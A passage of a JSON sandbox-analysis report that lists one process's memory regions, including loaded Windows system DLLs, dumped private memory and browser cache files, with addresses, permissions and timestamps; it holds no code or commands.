"timestamp": "00:00:12.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1991442432, "type": "region", "version": 1 }, "end_va": 1992085503, "entry_point": 1991442432, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_169", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1991442432, "timestamp": "00:00:12.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997537280, "type": "region", "version": 1 }, "end_va": 1997893631, "entry_point": 1997537280, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_170", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997537280, "timestamp": "00:00:12.678", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_171", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:12.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:12.742", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000173-addr_0x0000000000740000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_18", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 7602176, "type": "region", "version": 1 }, "end_va": 7667711, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000000740000", "norm_filename": null, "region_type": "private_memory", "start_va": 7602176, "timestamp": "00:00:12.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 9273343, "entry_point": 0, "filename": null, "id": "region_174", "name": "pagefile_0x0000000000750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7667712, "timestamp": "00:00:12.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1990197248, "type": "region", "version": 1 }, "end_va": 1991032831, "entry_point": 1990197248, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_175", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1990197248, "timestamp": "00:00:12.760", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1991049216, "type": "region", "version": 1 }, "end_va": 1991442431, "entry_point": 1991049216, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_176", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1991049216, "timestamp": "00:00:12.768", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000177-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_19", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:12.907", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000178-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_20", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:12.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 10883071, "entry_point": 0, "filename": null, "id": "region_179", "name": "pagefile_0x00000000008e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9306112, "timestamp": "00:00:12.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 31916031, "entry_point": 0, "filename": null, "id": "region_180", "name": "pagefile_0x0000000000a70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10944512, "timestamp": "00:00:12.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 34861055, "entry_point": 31916032, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_181", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31916032, "timestamp": "00:00:12.907", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000182-addr_0x0000000000210000-size_0x0000000000015000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_21", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 86016, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2248703, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:13.056", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000183-addr_0x0000000000230000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_22", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2310143, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:00:13.388", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000184-addr_0x00000000002c0000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_23", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2899967, "entry_point": 0, "filename": null, "id": "region_184", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:13.388", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000185-addr_0x00000000002d0000-size_0x0000000000007000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_24", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 28672, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2977791, "entry_point": 0, "filename": null, "id": "region_185", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:00:13.388", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1966604288, "type": "region", "version": 1 }, "end_va": 1966821375, "entry_point": 1966604288, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_186", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1966604288, "timestamp": "00:00:13.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992097792, "type": "region", "version": 1 }, "end_va": 1992122367, "entry_point": 1992097792, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_187", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992097792, "timestamp": "00:00:13.415", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000188-addr_0x00000000002e0000-size_0x0000000000060000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_25", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 393216, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:00:13.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1985634303, "entry_point": 1984364544, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_189", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:13.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1992163328, "type": "region", "version": 1 }, "end_va": 1993166847, "entry_point": 1992163328, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_190", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1992163328, "timestamp": "00:00:13.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1995616255, "entry_point": 1993539584, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_191", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:00:13.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1968635904, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1968635904, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_192", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1968635904, "timestamp": "00:00:13.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1983774720, "type": "region", "version": 1 }, "end_va": 1984360447, "entry_point": 1983774720, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_193", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1983774720, "timestamp": "00:00:13.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1989017600, "type": "region", "version": 1 }, "end_va": 1990184959, "entry_point": 1989017600, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_194", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1989017600, "timestamp": "00:00:13.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 2001928192, "type": "region", "version": 1 }, "end_va": 2001977343, "entry_point": 2001928192, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_195", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 2001928192, "timestamp": "00:00:13.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1983750143, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_196", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:13.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_197", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:00:14.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1960902656, "type": "region", "version": 1 }, "end_va": 1962598399, "entry_point": 1960902656, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_198", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1960902656, "timestamp": "00:00:14.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 2883584, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_199", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:00:14.549", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": null, "id": "region_200", "name": "pagefile_0x00000000002d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2949120, "timestamp": "00:00:14.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 0, "filename": null, "id": "region_201", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:14.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1960837120, "type": "region", "version": 1 }, "end_va": 1960882175, "entry_point": 1960837120, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_202", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1960837120, "timestamp": "00:00:14.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3063807, "entry_point": 3014656, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_203", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3014656, "timestamp": "00:00:14.565", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000204-addr_0x0000000000300000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_26", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:00:14.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3112959, "entry_point": 3080192, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_205", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:00:14.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 3407872, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_206", "name": "index.dat", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3407872, "timestamp": "00:00:14.567", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000207-addr_0x0000000000350000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:00:14.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000208-addr_0x00000000005c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 7077887, "entry_point": 0, "filename": null, "id": "region_208", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:00:14.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000209-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:00:14.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1960775679, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_210", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:00:14.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1993211904, "type": "region", "version": 1 }, "end_va": 1993494527, "entry_point": 1993211904, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_211", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1993211904, "timestamp": "00:00:14.592", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1960312832, "type": "region", "version": 1 }, "end_va": 1960591359, "entry_point": 1960312832, "filename": "\\Windows\\SysWOW64\\dnsapi.dll", "id": "region_212", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\syswow64\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1960312832, "timestamp": "00:00:14.607", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000213-addr_0x0000000002140000-size_0x0000000000130000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1245184, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x0000000002140000", "norm_filename": null, "region_type": "private_memory", "start_va": 34865152, "timestamp": "00:00:14.621", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1960181760, "type": "region", "version": 1 }, "end_va": 1960296447, "entry_point": 1960181760, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_214", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1960181760, "timestamp": "00:00:14.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1960116224, "type": "region", "version": 1 }, "end_va": 1960144895, "entry_point": 1960116224, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_215", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1960116224, "timestamp": "00:00:14.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1960099839, "entry_point": 1959854080, "filename": "\\Windows\\SysWOW64\\mswsock.dll", "id": "region_216", "name": "mswsock.dll", "norm_filename": "c:\\windows\\syswow64\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:00:14.657", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000217-addr_0x0000000002140000-size_0x00000000000f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 983040, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 35848191, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000002140000", "norm_filename": null, "region_type": "private_memory", "start_va": 34865152, "timestamp": "00:00:14.669", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000218-addr_0x0000000002230000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 35848192, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000002230000", "norm_filename": null, "region_type": "private_memory", "start_va": 35848192, "timestamp": "00:00:14.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1959788544, "type": "region", "version": 1 }, "end_va": 1959809023, "entry_point": 1959788544, "filename": "\\Windows\\SysWOW64\\WSHTCPIP.DLL", "id": "region_219", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\syswow64\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1959788544, "timestamp": "00:00:14.685", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1959723008, "type": "region", "version": 1 }, "end_va": 1959788543, "entry_point": 1959723008, "filename": "\\Windows\\SysWOW64\\nlaapi.dll", "id": "region_220", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\syswow64\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1959723008, "timestamp": "00:00:14.696", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000221-addr_0x0000000000420000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:14.708", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000222-addr_0x0000000002270000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 37158911, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, "timestamp": "00:00:14.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1959657472, "type": 